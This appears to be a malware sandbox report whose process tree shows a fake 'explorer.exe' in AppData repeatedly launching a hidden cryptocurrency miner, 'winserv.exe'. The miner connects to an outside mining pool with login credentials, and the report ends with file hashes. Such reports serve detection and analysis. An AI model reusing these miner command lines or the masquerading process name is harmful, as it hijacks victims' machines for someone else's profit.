C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3384
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2668
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3328
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3980
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3988
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4152
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2268
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1204
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:64
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2604
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1232
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1408
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1884
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4572
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4428
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4528
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1108
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2900
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2136
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1180
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5092
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2960
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2884
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2312
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1016
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4008
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3732
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3536
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3624
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3152
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4624
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2348
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4608
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4952
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4428
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1560
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3192
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4228
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3140
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3708
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4488
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3780
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4144
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4832
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2596
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2884
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4776
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3444
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:916
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2788
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2876
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3624
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3184
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2824
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:628
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2012
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4348
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4848
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1728
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2860
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3708
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3676
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2136
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2668
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2792
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4912
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2576
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4120
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2892
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1544
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4008
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4112
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3636
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4356
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4448
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1388
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4880
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3128
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1952
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4684
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3460
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3748
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:928
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3124
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4312
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2216
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5004
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2168
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4776
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1016
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3380
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:872
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4676
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3440
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:840
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:912
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:4344
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:404
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4428
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2304
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3300
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4228
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2368
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4400
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3632
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:452
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1516
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4408
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3160
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2096
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:396
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3376
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4480
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3564
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:748
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2664
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:872
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3956
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3932
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3288
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4296
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3300
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4428
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4636
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4880
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4684
Network
MITRE ATT&CK Enterprise v16
Downloads
-
Filesize
48KB
MD5 c4ad493a6bfd212c4e1418ba605020af
SHA1 20272ac81bd1df68603924ae3b1fe4c2df034a29
SHA256 492bd918e98e5802cf1ff5d3f0537567a7657477fff9cb5e7657448f64ead496
SHA512 736487e85b4986284139599befb69a3483108c6199e6737524aafad9daa8614e67ab244859d71affacbcebba8e07af91fb2c4c10484f7988fa7dacd51897ccaf